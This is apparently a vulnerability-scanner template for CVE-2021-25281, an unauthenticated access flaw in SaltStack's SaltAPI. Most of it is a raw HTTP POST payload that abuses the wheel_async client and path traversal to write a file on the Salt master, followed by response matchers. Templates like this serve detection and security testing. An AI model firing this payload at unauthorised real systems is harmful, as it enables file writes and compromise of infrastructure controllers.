id: CVE-2021-25281 info: name: CVE-2021-25281 - SaltStack wheel_async unauth access author: madrobot severity: critical reference: http://hackdig.com/02/hack-283902.htm description: The SaltAPI does not honor eauth credentials for the wheel_async client. Thus, an attacker can remotely run any wheel modules on the master. tags: cve,cve2021,saltapi,rce,saltstack requests: - raw: - | POST /run HTTP/1.1 Host: {{Hostname}} Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Content-Type: application/json Content-Length: 173 Connection: close {"client":"wheel_async","fun":"pillar_roots.write","data":"testing","path":"../../../../../../../tmp/testing","username":"1","password":"1","eauth":"pam"} matchers-condition: and matchers: - type: word words: - "return" - "tag" - "jid" - "salt" - "wheel" part: body condition: and - type: status status: - 200